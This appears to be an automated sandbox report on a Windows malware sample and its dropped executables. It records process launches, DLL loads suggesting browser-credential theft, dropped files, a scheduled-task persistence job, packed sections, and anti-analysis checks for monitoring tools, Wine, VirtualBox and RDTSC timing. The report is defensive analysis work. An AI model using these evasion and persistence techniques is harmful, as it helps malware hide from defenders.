Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2236,i,13354329722629723967,17457331017763836313,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe "C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2272,i,9092242746492624172,9017713632823041127,262144 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: mstask.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: dui70.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: duser.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: chartv.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: oleacc.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: winsta.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: textshaping.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Google Drive.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 5239808 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x249000
Source: file.exe Static PE information: Raw size of inxiwgrb is bigger than: 0x100000 < 0x2b2800
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W;inxiwgrb:EW;mdkdbixl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;inxiwgrb:EW;mdkdbixl:EW;.taggant:EW;
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Unpacked PE file: 16.2.KJJJKFIIIJ.exe.950000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 17.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 18.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 20.2.skotes.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;urdywiyw:EW;pwtoxbng:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: skotes.exe.16.dr Static PE information: real checksum: 0x321a44 should be: 0x312a79
Source: file.exe Static PE information: real checksum: 0x5006fb should be: 0x5015dd
Source: random[1].exe.0.dr Static PE information: real checksum: 0x321a44 should be: 0x312a79
Source: 5762ea743c.exe.20.dr Static PE information: real checksum: 0x1c9748 should be: 0x1cf875
Source: random[1].exe.20.dr Static PE information: real checksum: 0x1c9748 should be: 0x1cf875
Source: KJJJKFIIIJ.exe.0.dr Static PE information: real checksum: 0x321a44 should be: 0x312a79
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: inxiwgrb
Source: file.exe Static PE information: section name: mdkdbixl
Source: file.exe Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: urdywiyw
Source: random[1].exe.0.dr Static PE information: section name: pwtoxbng
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name:
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name: .idata
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name: urdywiyw
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name: pwtoxbng
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.16.dr Static PE information: section name:
Source: skotes.exe.16.dr Static PE information: section name: .idata
Source: skotes.exe.16.dr Static PE information: section name: urdywiyw
Source: skotes.exe.16.dr Static PE information: section name: pwtoxbng
Source: skotes.exe.16.dr Static PE information: section name: .taggant
Source: random[1].exe.20.dr Static PE information: section name:
Source: random[1].exe.20.dr Static PE information: section name: .idata
Source: random[1].exe.20.dr Static PE information: section name:
Source: random[1].exe.20.dr Static PE information: section name: kgsecyxg
Source: random[1].exe.20.dr Static PE information: section name: wijvifly
Source: random[1].exe.20.dr Static PE information: section name: .taggant
Source: 5762ea743c.exe.20.dr Static PE information: section name:
Source: 5762ea743c.exe.20.dr Static PE information: section name: .idata
Source: 5762ea743c.exe.20.dr Static PE information: section name:
Source: 5762ea743c.exe.20.dr Static PE information: section name: kgsecyxg
Source: 5762ea743c.exe.20.dr Static PE information: section name: wijvifly
Source: 5762ea743c.exe.20.dr Static PE information: section name: .taggant
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_0096D91C push ecx; ret 16_2_0096D92F
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00961359 push es; ret 16_2_0096135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A2D91C push ecx; ret 17_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A2D91C push ecx; ret 18_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A2D91C push ecx; ret 20_2_00A2D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A2DFC6 push ecx; ret 20_2_00A2DFD9
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.008684570285353
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name: entropy: 7.008684570285353
Source: skotes.exe.16.dr Static PE information: section name: entropy: 7.008684570285353
Source: random[1].exe.20.dr Static PE information: section name: entropy: 7.9861736728364
Source: random[1].exe.20.dr Static PE information: section name: kgsecyxg entropy: 7.954010447908177
Source: 5762ea743c.exe.20.dr Static PE information: section name: entropy: 7.9861736728364
Source: 5762ea743c.exe.20.dr Static PE information: section name: kgsecyxg entropy: 7.954010447908177

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\KJJJKFIIIJ.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774389 second address: 7743A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C86h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779B38 second address: 779B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779B3C second address: 779B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779B4B second address: 779B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779B60 second address: 779B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779B66 second address: 779B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779E25 second address: 779E37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
